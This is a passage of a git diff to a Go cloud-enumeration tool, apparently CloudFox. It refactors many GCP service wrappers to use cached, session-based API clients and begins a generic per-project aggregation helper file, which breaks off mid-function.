a/gcp/services/networkEndpointsService/networkEndpointsService.go +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -6,16 +6,41 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" compute "google.golang.org/api/compute/v1" servicenetworking "google.golang.org/api/servicenetworking/v1" ) -type NetworkEndpointsService struct{} +type NetworkEndpointsService struct { + session *gcpinternal.SafeSession +} func New() *NetworkEndpointsService { return &NetworkEndpointsService{} } +func NewWithSession(session *gcpinternal.SafeSession) *NetworkEndpointsService { + return &NetworkEndpointsService{ + session: session, + } +} + +// getComputeService returns a Compute service client using cached session if available +func (s *NetworkEndpointsService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// getServiceNetworkingService returns a Service Networking service client using cached session if available +func (s *NetworkEndpointsService) getServiceNetworkingService(ctx context.Context) (*servicenetworking.APIService, error) { + if s.session != nil { + return sdk.CachedGetServiceNetworkingService(ctx, s.session) + } + return servicenetworking.NewService(ctx) +} + // PrivateServiceConnectEndpoint represents a PSC endpoint type PrivateServiceConnectEndpoint struct { Name string `json:"name"` @@ -64,7 +89,7 @@ type ServiceAttachment struct { // GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getComputeService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -134,7 +159,7 @@ func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID st // GetPrivateConnections retrieves private service connections func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]PrivateConnection, error) { ctx := context.Background() - service, err := servicenetworking.NewService(ctx) + service, err := s.getServiceNetworkingService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") } @@ -142,7 +167,7 @@ func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]Pri var connections []PrivateConnection // List connections for the project's networks - computeService, err := compute.NewService(ctx) + computeService, err := s.getComputeService(ctx) if err != nil { return nil, err } @@ -186,7 +211,7 @@ func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]Pri // GetServiceAttachments retrieves PSC service attachments (producer side) func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getComputeService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index c104ea2c..4028dca3 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -8,6 +8,7 @@ import ( ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) @@ -71,17 +72,18 @@ func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { return &NetwworkService{session: session} } +// getService returns a compute service, using cached wrapper if session is available +func (ns *NetwworkService) getService(ctx context.Context) (*compute.Service, error) { + if ns.session != nil { + return sdk.CachedGetComputeService(ctx, ns.session) + } + return compute.NewService(ctx) +} + // Returns firewall rules for a project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - var computeService *compute.Service - var err error - - if ns.session != nil { - computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -339,14 +341,7 @@ type FirewallRuleInfo struct { // Networks retrieves all VPC networks in a project func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { ctx := context.Background() - var computeService *compute.Service - var err error - - if ns.session != nil { - computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -391,14 +386,7 @@ func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { // Subnets retrieves all subnets in a project func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { ctx := context.Background() - var computeService *compute.Service - var err error - - if ns.session != nil { - computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -435,14 +423,7 @@ func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { // FirewallRulesEnhanced retrieves firewall rules with security analysis func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { ctx := context.Background() - var computeService *compute.Service - var err error - - if ns.session != nil { - computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -530,16 +511,5 @@ func extractRegionFromURL(url string) string { // GetComputeService returns a compute.Service instance for external use func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { - var computeService *compute.Service - var err error - - if ns.session != nil { - computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } - if err != nil { - return nil, err - } - return computeService, nil + return ns.getService(ctx) } diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go index fd7bed6f..5127bc73 100644 --- a/gcp/services/notebooksService/notebooksService.go +++ b/gcp/services/notebooksService/notebooksService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" notebooks "google.golang.org/api/notebooks/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { return &NotebooksService{session: session} } +// getService returns a Notebooks service client using cached session if available +func (s *NotebooksService) getService(ctx context.Context) (*notebooks.Service, error) { + if s.session != nil { + return sdk.CachedGetNotebooksService(ctx, s.session) + } + return notebooks.NewService(ctx) +} + // NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance type NotebookInstanceInfo struct { Name string `json:"name"` @@ -69,14 +78,8 @@ type RuntimeInfo struct { // ListInstances retrieves all notebook instances func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { ctx := context.Background() - var service *notebooks.Service - var err error - if s.session != nil { - service, err = notebooks.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = notebooks.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") } @@ -103,14 +106,8 @@ func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceIn // ListRuntimes retrieves all managed notebook runtimes func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) { ctx := context.Background() - var service *notebooks.Service - var err error - if s.session != nil { - service, err = notebooks.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = notebooks.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") } diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go index 0eb96d7b..4fff232c 100644 --- a/gcp/services/orgpolicyService/orgpolicyService.go +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/orgpolicy/v2" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { return &OrgPolicyService{session: session} } +// getService returns an Org Policy service client using cached session if available +func (s *OrgPolicyService) getService(ctx context.Context) (*orgpolicy.Service, error) { + if s.session != nil { + return sdk.CachedGetOrgPolicyService(ctx, s.session) + } + return orgpolicy.NewService(ctx) +} + // OrgPolicyInfo represents an organization policy type OrgPolicyInfo struct { Name string `json:"name"` @@ -151,14 +160,8 @@ var SecurityRelevantConstraints = map[string]struct { // ListProjectPolicies lists all org policies for a project func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { ctx := context.Background() - var service *orgpolicy.Service - var err error - if s.session != nil { - service, err = orgpolicy.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = orgpolicy.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") } diff --git a/gcp/services/pubsubService/pubsubService.go b/gcp/services/pubsubService/pubsubService.go index 89fdbb9b..143ce534 100644 --- a/gcp/services/pubsubService/pubsubService.go +++ b/gcp/services/pubsubService/pubsubService.go @@ -6,15 +6,31 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" pubsub "google.golang.org/api/pubsub/v1" ) -type PubSubService struct{} +type PubSubService struct { + session *gcpinternal.SafeSession +} func New() *PubSubService { return &PubSubService{} } +func NewWithSession(session *gcpinternal.SafeSession) *PubSubService { + return &PubSubService{ + session: session, + } +} + +func (ps *PubSubService) getService(ctx context.Context) (*pubsub.Service, error) { + if ps.session != nil { + return sdk.CachedGetPubSubService(ctx, ps.session) + } + return pubsub.NewService(ctx) +} + // IAMBinding represents a single IAM role/member binding type IAMBinding struct { Role string `json:"role"` @@ -74,7 +90,7 @@ type SubscriptionInfo struct { func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { ctx := context.Background() - service, err := pubsub.NewService(ctx) + service, err := ps.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } @@ -113,7 +129,7 @@ func (ps *PubSubService) Topics(projectID string) ([]TopicInfo, error) { func (ps *PubSubService) Subscriptions(projectID string) ([]SubscriptionInfo, error) { ctx := context.Background() - service, err := pubsub.NewService(ctx) + service, err := ps.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") } diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go index dbea1fb2..724477ba 100644 --- a/gcp/services/resourceIAMService/resourceIAMService.go +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -11,6 +11,7 @@ import ( "cloud.google.com/go/pubsub" "cloud.google.com/go/storage" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" run "google.golang.org/api/run/v1" secretmanager "google.golang.org/api/secretmanager/v1" "google.golang.org/api/iterator" @@ -41,6 +42,30 @@ func (s *ResourceIAMService) getClientOption() option.ClientOption { return nil } +// getSecretManagerService returns a cached Secret Manager service +func (s *ResourceIAMService) getSecretManagerService(ctx context.Context) (*secretmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerService(ctx, s.session) + } + return secretmanager.NewService(ctx) +} + +// getCloudFunctionsService returns a cached Cloud Functions service (v1) +func (s *ResourceIAMService) getCloudFunctionsService(ctx context.Context) (*cloudfunctions.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudFunctionsService(ctx, s.session) + } + return cloudfunctions.NewService(ctx) +} + +// getCloudRunService returns a cached Cloud Run service +func (s *ResourceIAMService) getCloudRunService(ctx context.Context) (*run.APIService, error) { + if s.session != nil { + return sdk.CachedGetCloudRunService(ctx, s.session) + } + return run.NewService(ctx) +} + // ResourceIAMBinding represents an IAM binding on a specific resource type ResourceIAMBinding struct { ResourceType string `json:"resourceType"` // bucket, dataset, topic, secret, etc. @@ -345,13 +370,7 @@ func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { var bindings []ResourceIAMBinding - var smService *secretmanager.Service - var err error - if s.session != nil { - smService, err = secretmanager.NewService(ctx, s.getClientOption()) - } else { - smService, err = secretmanager.NewService(ctx) - } + smService, err := s.getSecretManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } @@ -474,13 +493,7 @@ func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([ func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { var bindings []ResourceIAMBinding - var cfService *cloudfunctions.Service - var err error - if s.session != nil { - cfService, err = cloudfunctions.NewService(ctx, s.getClientOption()) - } else { - cfService, err = cloudfunctions.NewService(ctx) - } + cfService, err := s.getCloudFunctionsService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") } @@ -530,13 +543,7 @@ func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { var bindings []ResourceIAMBinding - var runService *run.APIService - var err error - if s.session != nil { - runService, err = run.NewService(ctx, s.getClientOption()) - } else { - runService, err = run.NewService(ctx) - } + runService, err := s.getCloudRunService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go index 6496d957..18fd8176 100644 --- a/gcp/services/schedulerService/schedulerService.go +++ b/gcp/services/schedulerService/schedulerService.go @@ -7,6 +7,7 @@ import ( "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" scheduler "google.golang.org/api/cloudscheduler/v1" ) @@ -31,12 +32,20 @@ var schedulerRegions = []string{ "africa-south1", "me-central1", "me-west1", } -type SchedulerService struct{} +type SchedulerService struct{ + session *gcpinternal.SafeSession +} func New() *SchedulerService { return &SchedulerService{} } +func NewWithSession(session *gcpinternal.SafeSession) *SchedulerService { + return &SchedulerService{ + session: session, + } +} + // JobInfo holds Cloud Scheduler job details with security-relevant information type JobInfo struct { Name string @@ -70,13 +79,21 @@ type JobInfo struct { Status string // Last attempt status } +// getService returns a Cloud Scheduler service client using cached session if available +func (ss *SchedulerService) getService(ctx context.Context) (*scheduler.Service, error) { + if ss.session != nil { + return sdk.CachedGetSchedulerService(ctx, ss.session) + } + return scheduler.NewService(ctx) +} + // Jobs retrieves all Cloud Scheduler jobs in a project across all regions // Note: The Cloud Scheduler API does NOT support the "-" wildcard for locations // so we must iterate through regions explicitly func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { ctx := context.Background() - service, err := scheduler.NewService(ctx) + service, err := ss.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") } diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index e9ff9357..e621e5aa 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -12,6 +12,7 @@ import ( secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "github.com/googleapis/gax-go/v2" "golang.org/x/oauth2/google" "google.golang.org/api/iterator" @@ -42,6 +43,14 @@ type SecretsService struct { session *gcpinternal.SafeSession } +// getClient returns a cached Secret Manager client +func (s *SecretsService) getClient(ctx context.Context) (*secretmanager.Client, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerClient(ctx, s.session) + } + return secretmanager.NewClient(ctx) +} + // New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ @@ -59,27 +68,21 @@ func New(client *secretmanager.Client) SecretsService { // NewWithSession creates a SecretsService with a SafeSession for managed authentication func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { ctx := context.Background() - var client *secretmanager.Client - var err error - - if session != nil { - client, err = secretmanager.NewClient(ctx, session.GetClientOption()) - } else { - client, err = secretmanager.NewClient(ctx) + ss := SecretsService{ + session: session, } + + client, err := ss.getClient(ctx) if err != nil { return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - ss := SecretsService{ - Client: &SecretsManagerClientWrapper{ - Closer: client.Close, - SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { - return client.ListSecrets(ctx, req, opts...) - }, - rawClient: client, + ss.Client = &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) }, - session: session, + rawClient: client, } return ss, nil } diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go index 1288d029..a18f3dc4 100644 --- a/gcp/services/serviceAgentsService/serviceAgentsService.go +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" ) -type ServiceAgentsService struct{} +type ServiceAgentsService struct{ + session *gcpinternal.SafeSession +} func New() *ServiceAgentsService { return &ServiceAgentsService{} } +func NewWithSession(session *gcpinternal.SafeSession) *ServiceAgentsService { + return &ServiceAgentsService{ + session: session, + } +} + // ServiceAgentInfo represents a Google-managed service agent type ServiceAgentInfo struct { Email string `json:"email"` @@ -105,10 +114,18 @@ var KnownServiceAgents = map[string]struct { }, } +// getResourceManagerService returns a Cloud Resource Manager service client using cached session if available +func (s *ServiceAgentsService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return cloudresourcemanager.NewService(ctx) +} + // GetServiceAgents retrieves all service agents with IAM bindings func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgentInfo, error) { ctx := context.Background() - service, err := cloudresourcemanager.NewService(ctx) + service, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go index 7d2b7f31..5aaaef24 100644 --- a/gcp/services/sourceReposService/sourceReposService.go +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" sourcerepo "google.golang.org/api/sourcerepo/v1" ) -type SourceReposService struct{} +type SourceReposService struct{ + session *gcpinternal.SafeSession +} func New() *SourceReposService { return &SourceReposService{} } +func NewWithSession(session *gcpinternal.SafeSession) *SourceReposService { + return &SourceReposService{ + session: session, + } +} + // RepoInfo represents a Cloud Source Repository type RepoInfo struct { Name string `json:"name"` @@ -33,10 +42,18 @@ type IAMBinding struct { Member string `json:"member"` } +// getService returns a source repo service client using cached session if available +func (s *SourceReposService) getService(ctx context.Context) (*sourcerepo.Service, error) { + if s.session != nil { + return sdk.CachedGetSourceRepoService(ctx, s.session) + } + return sourcerepo.NewService(ctx) +} + // ListRepos retrieves all Cloud Source Repositories in a project func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { ctx := context.Background() - service, err := sourcerepo.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") } diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go index db8e12b0..7b5909cd 100644 --- a/gcp/services/spannerService/spannerService.go +++ b/gcp/services/spannerService/spannerService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" spanner "google.golang.org/api/spanner/v1" ) @@ -17,6 +18,12 @@ func New() *SpannerService { return &SpannerService{} } +func NewWithSession(session *gcpinternal.SafeSession) *SpannerService { + return &SpannerService{ + session: session, + } +} + // IAMBinding represents a single IAM binding (one role + one member) type IAMBinding struct { Role string `json:"role"` @@ -50,10 +57,18 @@ type SpannerResult struct { Databases []SpannerDatabaseInfo } +// getService returns a Spanner service client using cached session if available +func (s *SpannerService) getService(ctx context.Context) (*spanner.Service, error) { + if s.session != nil { + return sdk.CachedGetSpannerService(ctx, s.session) + } + return spanner.NewService(ctx) +} + // ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { ctx := context.Background() - service, err := spanner.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") } diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go index 2da8705a..a5ddb1d9 100644 --- a/gcp/services/vpcService/vpcService.go +++ b/gcp/services/vpcService/vpcService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" compute "google.golang.org/api/compute/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *VPCService { return &VPCService{session: session} } +// getService returns a Compute service client using cached session if available +func (s *VPCService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + // VPCNetworkInfo represents a VPC network type VPCNetworkInfo struct { Name string `json:"name"` @@ -76,14 +85,8 @@ type RouteInfo struct { // ListVPCNetworks retrieves all VPC networks func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -106,14 +109,8 @@ func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) // ListSubnets retrieves all subnets func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -140,14 +137,8 @@ func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { // ListVPCPeerings retrieves all VPC peering connections func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -185,14 +176,8 @@ func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) // ListRoutes retrieves all routes func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { ctx := context.Background() - var service *compute.Service - var err error - if s.session != nil { - service, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = compute.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go index 9d040989..bf83943b 100644 --- a/gcp/services/vpcscService/vpcscService.go +++ b/gcp/services/vpcscService/vpcscService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { return &VPCSCService{session: session} } +// getService returns an Access Context Manager service client using cached session if available +func (s *VPCSCService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + // AccessPolicyInfo represents an access policy type AccessPolicyInfo struct { Name string `json:"name"` @@ -72,14 +81,8 @@ type AccessLevelInfo struct { // ListAccessPolicies retrieves all access policies for an organization func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { ctx := context.Background() - var service *accesscontextmanager.Service - var err error - if s.session != nil { - service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = accesscontextmanager.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } @@ -111,14 +114,8 @@ func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, err // ListServicePerimeters retrieves all service perimeters for an access policy func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { ctx := context.Background() - var service *accesscontextmanager.Service - var err error - if s.session != nil { - service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = accesscontextmanager.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } @@ -144,14 +141,8 @@ func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerime // ListAccessLevels retrieves all access levels for an access policy func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { ctx := context.Background() - var service *accesscontextmanager.Service - var err error - if s.session != nil { - service, err = accesscontextmanager.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = accesscontextmanager.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go index 161c020f..d2f4206b 100644 --- a/gcp/services/workloadIdentityService/workloadIdentityService.go +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -6,15 +6,32 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" iam "google.golang.org/api/iam/v1" ) -type WorkloadIdentityService struct{} +type WorkloadIdentityService struct{ + session *gcpinternal.SafeSession +} func New() *WorkloadIdentityService { return &WorkloadIdentityService{} } +func NewWithSession(session *gcpinternal.SafeSession) *WorkloadIdentityService { + return &WorkloadIdentityService{ + session: session, + } +} + +// getIAMService returns an IAM service client using cached session if available +func (s *WorkloadIdentityService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + // WorkloadIdentityPool represents a Workload Identity Pool type WorkloadIdentityPool struct { Name string `json:"name"` @@ -59,7 +76,7 @@ type FederatedIdentityBinding struct { func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { ctx := context.Background() - iamService, err := iam.NewService(ctx) + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -97,7 +114,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, error) { ctx := context.Background() - iamService, err := iam.NewService(ctx) + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } @@ -150,7 +167,7 @@ func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolI func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { ctx := context.Background() - iamService, err := iam.NewService(ctx) + iamService, err := s.getIAMService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } diff --git a/gcp/shared/aggregate.go b/gcp/shared/aggregate.go new file mode 100644 index 00000000..9eb87fc5 --- /dev/null +++ b/gcp/shared/aggregate.go @@ -0,0 +1,239 @@ +package shared + +// AggregateFromProjects combines items from a per-project map into a single slice. +// This is a common pattern in GCP modules where data is collected per-project +// and then needs to be aggregated for output. +// +// Note: Go generics require Go 1.18+. If you need to support older versions, +// use the type-specific functions below or copy this pattern. +// +// Example usage: +// +// projectBuckets := map[string][]BucketInfo{ +// "project-a": {bucket1, bucket2}, +// "project-b": {bucket3}, +// } +// allBuckets := AggregateFromProjects(projectBuckets) +// // Result: []BucketInfo{bucket1, bucket2, bucket3} +func AggregateFromProjects[T any](projectMap map[string][]T) []T { + var result []T + for _, items := range projectMap { + result = append(result, items...) + } + return result +} + +// AggregateWithProject combines items from a per-project map and adds project context. +// The transform function receives the project ID and item, allowing you to +// enrich or transform items as they're aggregated. +// +// Example usage: +// +// type EnrichedItem struct { +// ProjectID string +// Name string +// } +// allItems := AggregateWithProject(projectMap, func(projectID string, item Item) EnrichedItem { +// return EnrichedItem{ProjectID: projectID, Name: item.Name} +// }) +func AggregateWithProject[T any, R 